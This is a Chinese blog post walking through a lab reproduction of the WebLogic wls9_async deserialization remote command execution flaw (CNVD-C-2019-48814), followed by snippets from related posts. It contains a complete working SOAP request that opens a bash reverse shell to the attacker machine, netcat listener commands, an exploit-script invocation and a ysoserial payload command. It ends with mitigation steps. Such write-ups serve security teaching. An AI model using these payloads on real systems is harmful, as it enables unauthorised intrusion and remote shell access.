漏洞复现 - - - WebLogic反序列化远程命令执行漏洞(二)

最新推荐文章于 2025-03-17 17:57:52 发布
最新推荐文章于 2025-03-17 17:57:52 发布
阅读量2.9k 收藏 9
点赞数 11
分类专栏: # 经典漏洞复现 网安 文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_67503304/article/details/126500734
版权

目录

一,漏洞信息

二,实验环境

三,漏洞利用

第一步.查看其是否开启了wls9_async_response组件

1.打开Centos

2.开启weblogic

3.访问weblogic

4.查看async 

5.访问AsyncResponseService 

 第二步,CNVD-C-2019-48814漏洞的具体利用

方法一:bp

1.监听

 2.开启代理

 3.使用bp抓包

 4.发送到repeater

 5.构造一个payload

6.go发送

7.查看终端监听 

 方法二:python脚本使用方法

1.监听

 2.使用python脚本

3.查看终端监听

 ​编辑

 四,解决办法

一,漏洞信息

漏洞编号:OracleWebLogic wls9-async反序列化远程命令执行漏洞(CNVD-C-2019-48814)

影响版本:WebLogic 10.x    WebLogic 12.1.3 

WebLogic Server是美国甲骨文(Oracle)公司开发的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。存在于weblogic自带的wls9_async_response.war组件及wls-wsat组件中,在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意HTTP 请求,未授权的情况下远程执行命令。部分版本WebLogic中默认包含的wls9_async_response包,主要是为WebLogic Server提供异步通讯服务。

反序列化:就是讲字节序列转化成对象的过程。

二,实验环境

服务器:Centos ,IP地址:10.1.1.100
攻击机器:kali ,IP地址:10.1.1.200
辅助工具:Firefox、burpsuite

来源:合天网安实验室

三,漏洞利用

第一步.查看其是否开启了wls9_async_response组件

1.打开Centos

service iptables stop                                     //关闭防火墙

2.开启weblogic

 cd /usr/local/weblogic/wlserver_10.3/samples/domains/wl_server/bin     //进入到这个目录

nohup ./startWebLogic.sh                              //启动weblogic

 

3.访问weblogic

切换到kali机器,打开http://10.1.1.100:7001

4.查看async 

http://10.1.1.100:7001/_async, 打开发现403,目录存在

 

5.访问AsyncResponseService 

访问发送服务,查看是否开启了wls9_async_response组件

http://10.1.1.100:7001/_async/AsyncResponseService

 

 第二步,CNVD-C-2019-48814漏洞的具体利用

方法一:bp

1.监听

nc -lvvp 666

 2.开启代理

如下图设置

 

 3.使用bp抓包

抓取http://10.1.1.100:7001/_async/AsyncResponseService页面

 4.发送到repeater

 5.构造一个payload

POST /_async/AsyncResponseService HTTP/1.1
Host: 10.1.1.100:7001
Content-Length: 789
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/10.1.1.200/666 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

6.go发送

点击go 发现出现202,说明发送成功

7.查看终端监听 

成功反弹到了shell 

 方法二:python脚本使用方法

1.监听

nc -lvvp 666

 2.使用python脚本

python async_reserve_shell.py http://10.1.1.100:7001/_async/AsyncResponseService 10.1.1.200 666                      

 

3.查看终端监听

 

 四,解决办法

找到并删除wls9_async_response.war、wls-wsat.war 然后重启Weblogic服务

或者将/_async/* 及 /wls-wsat/*  的路径的URL访问注释静止

复现nuclei——CVE-2019-2729Weblogic反序列化远程代码执行漏洞
记录并分享学习安全的知识点..
01-20 2891
一、漏洞介绍 该漏洞是由wls9-async组件导致,在反序列化处理输入信息时存在缺陷,攻击者可以在/_async/AsyncResponseService路径下传入恶意的XML格式的数据,传入的数据在服务器端反序列化时,执行其中的恶意代码,实现远程命令执行,进而攻击者可以获得整台服务器的权限。 、影响版本 WebLogic 10.X WebLogic 12.1.3 三、漏洞检测方法 法一:访问http://youip:7001/_async/(返回403说明存在,返回404说明不存在)
Weblogic反序列化命令执行漏洞(CVE-2018-2628)复现
君莫hacker的博客
09-11 1万+
目录0x01 漏洞介绍0x02 环境部署:0x03 漏洞复现0x04 漏洞修复 0x01 漏洞介绍 漏洞描述 Weblogic Server WLS Core Components反序列化命令执行漏洞(CVE-2018-2628),该漏洞通过T3协议触发,可导致未授权的用户在远程服务器执行任意命令 漏洞编号 CVE-2018-2628 受影响版本 Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.2 Weblogic 12.2.1.3 0
Weblogic wls9_async_response 反序列化远程命令执行漏洞(CNVD-C-2019-48814)
热门推荐
SoulCat
04-26 1万+
Weblogic wls9_async_response 反序列化远程命令执行漏洞(CNVD-C-2019-48814) 漏洞概述: 该漏洞存在于wls9-async组件,这个组件主要作用是异步通讯服务,攻击者可以向/_async/AsyncResponseService路径下传入构造好的恶意xml格式的数据,传入的数据在服务器端反序列化时,执行其中的恶意代码,从而可以getshell’。 漏...
WebLogic反序列化远程命令执行(CNVD-C-2019-48814)
weixin_51151498的博客
12-07 916
WebLogic反序列化远程命令执行(CNVD-C-2019-48814)
CVE重要漏洞复现Weblogic_T3反序列化漏洞
最新发布
没有网络安全就没有国家安全
03-17 1124
CVE重要漏洞复现Weblogic_T3反序列化漏洞
Weblogic反序列化远程命令执行(CVE-2019-2725)
m0_65150886的博客
12-27 1363
CVE-2019-2725是一个Oracle weblogic反序列化远程命令执行漏洞,这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,通过针对Oracle官网历年来的补丁构造payload来绕过。5.将GET改为POST,随后请求包部分除了第一行第行保留,其他全部替换如下payload。2.可以访问/_async/AsyncResponseService,则存在漏洞。6.使用payload上传jsp木马。1.访问ip:port。1.升级本地JDK环境。4.开启http服务。
CNVD-C-2019-48814 WebLogic反序列化远程命令执行漏洞
yyj1781572的博客
04-05 861
WebLogic Server是美国甲骨文(Oracle)公司开发的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台。而wls9_async_response组件主要是为WebLogic Server提供异步通讯服务。通过本实验大家可以掌握验证CNVD-C-2019-48814漏洞的方法和对其进一步的利用。学会如何修复此漏洞
Weblogic 远程命令执行漏洞(CVE-2023-21839
Myu_wzy的博客
04-27 1041
Weblogic 远程命令执行漏洞(CVE-2023-21839
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它允许攻击者通过发送恶意构造的序列化对象来执行任意代码,从而获得对服务器的完全控制。这个漏洞存在于WebLogic ...
WebLogic 反序列化远程代码执行漏洞(CVE-2018-2628)漏洞复现
lc0813的博客
04-13 1574
漏洞概述: 在 WebLogic 里,攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行该漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议数据,就可以获取目标服务器的权限。 名词概念: 序列化:序列化 (Serialization)是将对象的状态...
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2024-2628 CVE-2024-21839复现)_weblogic payload
2401_84264662的博客
04-26 1204
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)
09-14
20180717官网发布Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)漏洞修复补丁
Web Weblogic wls9-async反序列化远程代码执行漏洞(CVE-2019-2725)
weixin_38477805的博客
05-13 2252
Web Weblogic wls9-async反序列化远程代码执行漏洞(CVE-2019-2725) 1.漏洞说明 1.1 描述:部分版本WebLogic中默认包含的wls9_async_response包,为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意 HTTP 请求,获得目标服务器的权限,在未授权的情况下远程执行命...
weblogic反序列化_【漏洞通告】Oracle WebLogic wls9-async反序列化远程命令执行漏洞通告...
weixin_39565777的博客
12-12 535
近日,青藤实验室监测到多家用户出现了利用WebLogic wls9-async反序列化进行挖矿的入侵事件,其主要体征为系统负载升高。用户运行的weblogic服务存在最新的weblogic反序列化漏洞,被成功利用后进行挖矿程序的下载与执行,从而进行虚拟货币的挖取,进而获取利益。1.综述WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAE...
weblogic安全漏洞一:Weblogic wls9_async_response 反序列化远程命令执行漏洞(CVE-2019-2725)
@someone
02-20 664
本文只介绍漏洞解决方案,具体复现请安装对应的漏洞版本进行实现即可 首先找到weblogic安装目录,找到lib文件夹并将wls9_async开头的jar包备份并删除 进入域目录的服务器目录下将临时目录(tmp)中的内容全部删除,最好是重建tmp目录,因为 此目录下有隐藏文件当然也可以使用ls -a命令显示具体的隐藏文件,重启服务即可解决此问题。 ...
Weblogic wls9_async_response 反序列化远程命令执行漏洞(CVE-2019-2725)复现
ditanji3425的博客
05-06 2268
一、 漏洞简介 漏洞编号和级别 CVE编号:CVE-2019-2725,危险级别:高危,CVSS分值:9.8。 CNVD 编号:CNVD-C-2019-48814,CNVD对该漏洞的综合评级为“高危”。 漏洞概述 2019年4月17日,国家信息安全漏洞共享平台(CNVD)收录了由中国民生银行股份有限公司报送的Oracle WebLogic wls9-async反序列化远...
WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)的复现过程
weixin_40950781的博客
09-01 1900
WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)漏洞复现WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)0x01 weblogic简介0x02漏洞简介0x03 影响的系统0x04 复现过程1. 复现环境及搭建过程1)靶机安装jdk2) 靶机搭建weblogic2. 漏洞利用0x05 cobalt...
weblogic 反序列化 [CVE-2017-10271]
npc88888的博客
05-10 1272
根据攻击者利用POC分析发现所利用的为wls-wsat组件的CoordinatorPortType接口,若Weblogic服务器集群中未应用此组件,建议临时备份后将此组件删除,当形成防护能力后,再进行恢复。WebLogic没有对XML的数据进行任何的过滤,导致可以构造XML数据,反序列化任意对象,从而RCE,这也就是CVE-2017-3506产生的原因。参考 https://blog.csdn.net/yumengzth/article/details/97522783。的WLS Security组件。
rmi远程反序列化rce漏洞_Weblogic wls9-async反序列化远程代码执行漏洞(CVE-2019-2725)漏洞分析...
weixin_30390951的博客
02-22 338
阅读:1,361这个漏洞最先由某厂商报给某银行,某银行再将该信息报给CNVD,后CNVD通告:国家信息安全漏洞共享平台(CNVD)收录了由该银行报送的Oracle WebLogic wls9-async反序列化远程命令执行漏洞(CNVD-C-2019-48814),详情见链接:cnvd对于该漏洞,Oracle官方也破例了一回,提前发了补丁,但是这个补丁只是针对10.3.6系列的,对于12版本系列...
weblogic 反序列化漏洞复现
02-11
### 复现 WebLogic 反序列化漏洞 为了在受控环境中复现 WebLogic反序列化漏洞,环境准备至关重要。建议在一个隔离的实验环境下操作,比如通过虚拟机搭建包含已知漏洞版本的 WebLogic 服务[^3]。 #### 准备工作 安装并配置好 Oracle WebLogic Server 特定易受攻击的版本。确保该服务器仅限于内部网络访问,防止外部未授权访问带来的风险。对于具体的版本选择,通常会选择官方已经确认存在反序列化漏洞的历史版本进行测试。 #### 利用工具构建恶意负载 利用 ysoserial 这样的开源工具来创建针对特定 Java 类型的反序列化有效载荷。此工具支持多种 gadget chain, 包括但不限于 `CommonsCollections1` 和其他适用于不同场景下的链路[^2]。 ```bash java -jar ysoserial.jar CommonsCollections1 "touch /tmp/hacked" | base64 - ``` 上述命令会生成一段 Base64 编码后的 payload 字符串,这段字符串将在后续请求中作为参数传递给目标应用。 #### 发送恶意请求触发漏洞 构造 HTTP 请求向量发送至 WebLogic 控制台或其他可能处理用户输入的地方。这可以通过 curl 或者 Burp Suite 等代理工具完成。下面是一个简单的例子: ```http POST /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1 Host: localhost:7001 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: JSESSIONID=... payload=<base64_encoded_payload> ``` 其中 `<base64_encoded_payload>` 是之前由 ysoserial 创建并通过 base64 编码得到的内容。 成功执行后,在 `/tmp` 目录下应该能看到名为 `hacked` 文件被创建出来,证明远程代码执行 (RCE) 成功实现。 请注意,以上过程仅供合法的安全研究用途,并严格遵循法律法规以及道德准则开展活动。任何非法入侵行为都是违法行为并将受到法律制裁。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

干掉芹菜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值